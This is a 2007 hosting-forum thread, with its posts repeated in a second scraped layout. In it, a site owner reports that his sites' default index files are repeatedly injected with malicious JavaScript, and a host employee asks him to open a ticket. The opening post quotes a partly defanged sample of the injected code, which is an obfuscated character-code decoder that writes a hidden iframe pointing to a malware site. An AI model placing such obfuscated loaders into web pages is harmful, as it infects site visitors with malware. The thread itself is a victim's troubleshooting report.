iframe malicious code injection

Oliy · 02-08-2007, 12:14 PM

Seemingly every day one of at least four websites I run on Cat2 servers gets attacked and every file called "index.php" or "default.asp" or any other default name gets injected with code similar to below:

HTML Code:

function Decode(){var temp="",i,c=0,out="";var str="60116!112!58!47!47!!112!100!101!115!105!103!110!111!110!108!105!110!101!46!99!111!109!47!118!105!47!105!110!100!101!120!46!104!116!109!108!34!32!119!105!100!116!104!61!48!32!104!101!59!34!6!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
	//-->											</SCRIPT><SCRIPT LANGUAGE="JavaScript">										<!--										Decode();		//-->

What the code does (I've deleted some stuff out of it so that it will hopefully now be harmless) is insert an iframe into your website which leads to a virus infecting site.

Now before you tell me that my site has some insecure upload script, two or three of those websites don't even have upload scripts at all, and those that do generally don't upload into the wwwroot / public_html folders so scripts couldn't be executed anyway. I've done some research and found that what is probably happening is that a single insecure upload script on any website on the server is trawling through the server harddrive and adding this bit of code to every default file it finds.

http://www.webmasterworld.com/javascript/3315690.htm

Solution? Upgrade security on the servers... at least find the insecure script that someone is running.
http://www.eukhost.com/forums/showthread.php?t=1305

I'm getting really sick of this, I have written a script both in php and asp to restore backups when a change is detected in one of these files but I sometimes miss the odd one and a user will complain to me and Google will list the site as infected. It worries me that these sites are being "hacked" on a daily basis and while currently I can detect and catch the behaviour it won't take much to change and get me again, and I'm sure many other people out there have this code on their websites without realising it.

paulredpath · 02-08-2007, 04:30 PM

Oily,

It may be useful for you to open a ticket so we can investigate this further. If someone was trawling the server overwriting peoples index pages we would have had several reports, however this is the first issue I have been made aware of. Our servers are patched regularly and we also audit all new servers and test the security with well known scripts, we have also moved to using PHPsuexec on all linux servers which further isolates each users website from another.

It doesn't have to be an upload script, it could be SQL injection or even a vulnerable mailer script. If you can open a ticket with the exact details we can take a look and see where the issue might lie.

02-08-2007, 12:14 PM	#1 (permalink)
Oliy Registered User Join Date: Jun 2003 Posts: 29	iframe malicious code injection Seemingly every day one of at least four websites I run on Cat2 servers gets attacked and every file called "index.php" or "default.asp" or any other default name gets injected with code similar to below: HTML Code: function Decode(){var temp="",i,c=0,out="";var str="60116!112!58!47!47!!112!100!101!115!105!103!110!111!110!108!105!110!101!46!99!111!109!47!118!105!47!105!110!100!101!120!46!104!116!109!108!34!32!119!105!100!116!104!61!48!32!104!101!59!34!6!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><SCRIPT LANGUAGE="JavaScript"> <!-- Decode(); //--> What the code does (I've deleted some stuff out of it so that it will hopefully now be harmless) is insert an iframe into your website which leads to a virus infecting site. Now before you tell me that my site has some insecure upload script, two or three of those websites don't even have upload scripts at all, and those that do generally don't upload into the wwwroot / public_html folders so scripts couldn't be executed anyway. I've done some research and found that what is probably happening is that a single insecure upload script on any website on the server is trawling through the server harddrive and adding this bit of code to every default file it finds. http://www.webmasterworld.com/javascript/3315690.htm Solution? Upgrade security on the servers... at least find the insecure script that someone is running. http://www.eukhost.com/forums/showthread.php?t=1305 I'm getting really sick of this, I have written a script both in php and asp to restore backups when a change is detected in one of these files but I sometimes miss the odd one and a user will complain to me and Google will list the site as infected. It worries me that these sites are being "hacked" on a daily basis and while currently I can detect and catch the behaviour it won't take much to change and get me again, and I'm sure many other people out there have this code on their websites without realising it. __________________ Everyone Makes Mistakes I Create Disasters

02-08-2007, 04:30 PM	#2 (permalink)
paulredpath Bring me your problems :p Join Date: Jan 2003 Location: /dev/ahhhhhhhhh Posts: 3,537	Oily, It may be useful for you to open a ticket so we can investigate this further. If someone was trawling the server overwriting peoples index pages we would have had several reports, however this is the first issue I have been made aware of. Our servers are patched regularly and we also audit all new servers and test the security with well known scripts, we have also moved to using PHPsuexec on all linux servers which further isolates each users website from another. It doesn't have to be an upload script, it could be SQL injection or even a vulnerable mailer script. If you can open a ticket with the exact details we can take a look and see where the issue might lie. __________________ Paul Redpath paul@catalyst2.com Go on, review Us at OC Host Review!

Thread Tools
Show Printable Version Email this Page
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread: